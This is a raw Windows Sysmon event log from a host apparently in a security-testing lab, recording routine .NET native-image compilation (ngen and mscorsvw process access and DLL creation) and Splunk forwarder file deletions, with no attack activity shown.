11241100x800000000000000020839Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:29.946{4DB9351A-A1DD-60D3-D303-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\fec-0\Microsoft.VisualC.dll2021-06-23 21:04:29.946 10341000x800000000000000020838Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:29.900{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DD-60D3-D303-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020837Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:29.853{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1DD-60D3-D303-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020836Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:29.853{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DD-60D3-D303-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020835Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:29.837{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DD-60D3-D203-00000000CF01}6896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020834Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:29.821{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1DD-60D3-D203-00000000CF01}6896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020833Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:29.821{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DD-60D3-D203-00000000CF01}6896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020832Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:29.696{4DB9351A-A1DD-60D3-D103-00000000CF01}3124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\c34-0\Microsoft.VisualBasic.Compatibility.Data.dll2021-06-23 21:04:29.696 23542300x800000000000000020831Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:29.415{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=105930C7BBE437BABEF9A72B4D7E1957,SHA256=71700865071BECB932832A63343FE3E27074EBF3450401FE13CBAE1479DFDB62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020830Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:29.415{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C1EE506BB9DA5CC7A3C64B2B5A08634F,SHA256=0EFEB4F6F0BFF9C29F679F5DCB696EA59B53D52560EE6EB28CEA1BFDFE114C1D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020829Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:29.369{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DD-60D3-D103-00000000CF01}3124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020828Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:29.337{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1DD-60D3-D103-00000000CF01}3124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020827Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:29.337{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DD-60D3-D103-00000000CF01}3124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020826Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:29.243{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DD-60D3-D003-00000000CF01}6716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020825Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:29.212{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1DD-60D3-D003-00000000CF01}6716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020824Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:31.194{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=824D041FE0E772B84CF2B0E0602D0095,SHA256=F9C2CBDF8EF115369860BF898AE94C9198981687B12E16219C873232C5C1A711,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020855Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.178{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DF-60D3-D703-00000000CF01}6432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020854Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.147{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1DF-60D3-D703-00000000CF01}6432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020853Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:31.147{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DF-60D3-D703-00000000CF01}6432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020852Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:31.053{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DF-60D3-D603-00000000CF01}5976C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020851Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:31.022{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1DF-60D3-D603-00000000CF01}5976C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020850Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:31.022{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DF-60D3-D603-00000000CF01}5976C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000020927Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:32.865{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1E0-60D3-EA03-00000000CF01}5716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020926Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.850{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1E0-60D3-EA03-00000000CF01}5716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020925Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:32.850{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1E0-60D3-EA03-00000000CF01}5716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020924Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:32.818{4DB9351A-A1E0-60D3-E903-00000000CF01}6332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\18bc-0\Microsoft.Windows.Dns.dll2021-06-23 21:04:32.818 23542300x800000000000000020923Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.772{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5B72973E267D9A6EA5B12C2FFF3F5A5C,SHA256=AF24EB44B04FD47647211F4FDF837315A43F3FACFE006C2739104BD00DE92A60,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020922Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:32.740{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1E0-60D3-E903-00000000CF01}6332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020921Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 